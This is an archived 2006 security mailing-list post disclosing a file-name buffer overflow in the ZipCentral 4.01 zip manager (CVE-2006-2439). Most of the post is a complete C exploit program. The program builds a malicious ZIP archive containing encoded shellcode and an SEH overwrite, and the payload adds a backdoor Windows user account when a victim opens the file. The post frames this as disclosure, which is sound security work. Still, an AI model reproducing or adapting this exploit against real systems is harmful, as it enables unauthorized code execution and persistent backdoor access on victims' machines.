[EXPL] ZipCentral File Name Buffer Overflow (Exploit)
- From: SecuriTeam <support@xxxxxxxxxxxxxx>
- Date: 31 Aug 2006 18:57:54 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
ZipCentral File Name Buffer Overflow (Exploit)
------------------------------------------------------------------------
SUMMARY
<http://zipcentral.iscool.net/> ZipCentral is a free and easy to use zip
file manager with all the utilities you need to manage your zip files.
A vulnerability in ZipCentral allows attackers to execute arbitrary code
on vulnerable systems when the user opens a malicious ZIP archive
containing a file with an overly long filename.
DETAILS
Vulnerable Systems:
* ZipCentral version 4.01
CVE Information:
<http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2439>
CVE-2006-2439
Exploit:
/*
ZipCentral 4.01 Exploit by bratax (http://www.bratax.be/)
Soooooo many thanks to BuzzDee and c0rrupt for helping me with all the
problems I encountered :) Wouldn't have finished this without you guys!
Greetz to everyone I like... (no, that doesn't include you turb00)!
******************************
Some technical info:
- vulnerability is available here:
<http://secunia.com/secunia_research/2006-35/advisory>
http://secunia.com/secunia_research/2006-35/advisory
- using SEH to exploit this
- some code might look weird in this source.. (e.g. shellcode,
offsets,...)
this is because a lot of values are changed in memory.. so use your
favorite
debugger to see the real values and codes
- shellcode adds a windows user "bck" with password "bck" (thx metasploit)
- tested on XP Pro English (SP2) and XP Home Dutch (SP2)
*/
#include <stdio.h>
#include <string.h>
unsigned char scode[] =
"\x89\x03\x59\x89\x05\x8a\x9b\x98\x98\x98\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34"
"\x42\x50\x42\x50\x42\x30\x4b\x58\x45\x34\x4e\x43\x4b\x48\x4e\x57"
"\x45\x30\x4a\x47\x41\x30\x4f\x4e\x4b\x58\x4f\x34\x4a\x31\x4b\x58"
"\x4f\x35\x42\x42\x41\x30\x4b\x4e\x49\x54\x4b\x48\x46\x43\x4b\x58"
"\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x59\x4e\x4a\x46\x58\x42\x4c"
"\x46\x37\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x50\x44\x4c\x4b\x4e"
"\x46\x4f\x4b\x43\x46\x45\x46\x32\x46\x50\x45\x47\x45\x4e\x4b\x38"
"\x4f\x35\x46\x52\x41\x30\x4b\x4e\x48\x56\x4b\x38\x4e\x50\x4b\x44"
"\x4b\x38\x4f\x55\x4e\x51\x41\x50\x4b\x4e\x4b\x38\x4e\x51\x4b\x58"
"\x41\x50\x4b\x4e\x49\x38\x4e\x45\x46\x52\x46\x50\x43\x4c\x41\x33"
"\x42\x4c\x46\x46\x4b\x58\x42\x54\x42\x53\x45\x58\x42\x4c\x4a\x57"
"\x4e\x50\x4b\x58\x42\x34\x4e\x50\x4b\x58\x42\x57\x4e\x41\x4d\x4a"
"\x4b\x38\x4a\x36\x4a\x50\x4b\x4e\x49\x30\x4b\x48\x42\x58\x42\x4b"
"\x42\x30\x42\x50\x42\x30\x4b\x48\x4a\x56\x4e\x33\x4f\x35\x41\x33"
"\x48\x4f\x42\x46\x48\x35\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x57"
"\x42\x55\x4a\x56\x42\x4f\x4c\x48\x46\x50\x4f\x35\x4a\x46\x4a\x49"
"\x50\x4f\x4c\x48\x50\x30\x47\x45\x4f\x4f\x47\x4e\x43\x56\x4d\x56"
"\x46\x46\x50\x42\x45\x46\x4a\x57\x45\x56\x42\x52\x4f\x42\x43\x36"
"\x42\x52\x50\x46\x45\x56\x46\x57\x42\x52\x45\x57\x43\x47\x45\x36"
"\x44\x47\x42\x42\x44\x46\x43\x56\x4b\x36\x42\x42\x44\x56\x43\x56"
"\x4b\x46\x42\x52\x4f\x42\x41\x34\x46\x44\x46\x34\x42\x32\x48\x42"
"\x48\x32\x42\x32\x50\x56\x45\x46\x46\x57\x42\x52\x4e\x36\x4f\x36"
"\x43\x46\x41\x56\x4e\x56\x47\x36\x44\x37\x4f\x46\x45\x37\x42\x37"
"\x42\x52\x41\x54\x46\x56\x4d\x36\x49\x36\x50\x36\x49\x56\x43\x37"
"\x46\x57\x44\x47\x41\x56\x46\x37\x4f\x56\x44\x47\x43\x57\x42\x52"
"\x44\x56\x43\x46\x4b\x46\x42\x32\x4f\x52\x41\x54\x46\x34\x46\x44"
"\x42\x30\x5a";
char head[] = "\x50\x4B\x03\x04\x14\x00\x00\x00\x00\x00"
"\xB7\xAC\xCE\x34\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x14\x08\x00";
char middle[] = "\x2e\x74\x78\x74\x50\x4B\x01\x02\x14\x00"
"\x14\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x14\x08\x00\x00\x00\x00\x00\x00"
"\x01\x00\x24\x00\x00\x00\x00\x00\x00";
char tail[] = "\x2e\x74\x78\x74\x50\x4B\x05\x06\x00\x00"
"\x00\x00\x01\x00\x01\x00\x42\x08\x00\x00"
"\x32\x08\x00\x00\x00";
int main(int argc,char *argv[])
{
char overflow[657]; // is 657 bytes big enough for a filename?
char overflow2[1407];
FILE *vuln;
if(argc == 1)
{
printf("ZipCentral 4.01 Buffer Overflow Exploit.\n");
printf("Coded by bratax (http://www.bratax.be/).\n");
printf("Usage: %s <outputfile>\n",argv[0]);
return 0;
}
vuln = fopen(argv[1],"w");
//build overflow buffer here.
memset(overflow,0x41,sizeof(overflow)); //fill with crap
memcpy(overflow+2, scode, 483); // our shellcode
memcpy(overflow+653, "\x82\x6E\xEC\x98", 4); // jmp back to shellcode
memset(overflow2, 0x42, sizeof(overflow2)); // more crap
memcpy(overflow2+0,"\x98\x85\x8E\x00", 4); // pop pop ret
// pop pop ret somewhere within 0x00xxxxFF.. needed because of 2 reasons
// which I'm not going to explain here right now..
// notice that 008E8598 will be changed in memory and will become 00C4E0FF
// this might be different on other machines, but will always be 00xxE0FF
if(vuln)
{
//Write file
fwrite(head, 1, sizeof(head), vuln);
fwrite(overflow, 1, sizeof(overflow), vuln);
fwrite(overflow2, 1, sizeof(overflow2), vuln);
fwrite(middle, 1, sizeof(middle), vuln);
fwrite(overflow, 1, sizeof(overflow), vuln);
fwrite(overflow2, 1, sizeof(overflow2), vuln);
fwrite(tail, 1, sizeof(tail), vuln);
fclose(vuln);
}
printf("File written.\nOpen with ZipCentral 4.01 to exploit.\n");
return 0;
}
ADDITIONAL INFORMATION
The information has been provided by <mailto:bratax@xxxxxxxxx> bratax ck.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@xxxxxxxxxxxxxx
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@xxxxxxxxxxxxxx
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Prev by Date: [UNIX] FREEKOT SQL Injection
- Next by Date: [UNIX] IBM eGatherer ActiveX Code Execution (PoC, Exploit)
- Previous by thread: [UNIX] FREEKOT SQL Injection
- Next by thread: [UNIX] IBM eGatherer ActiveX Code Execution (PoC, Exploit)
- Index(es):
Relevant Pages
|
|
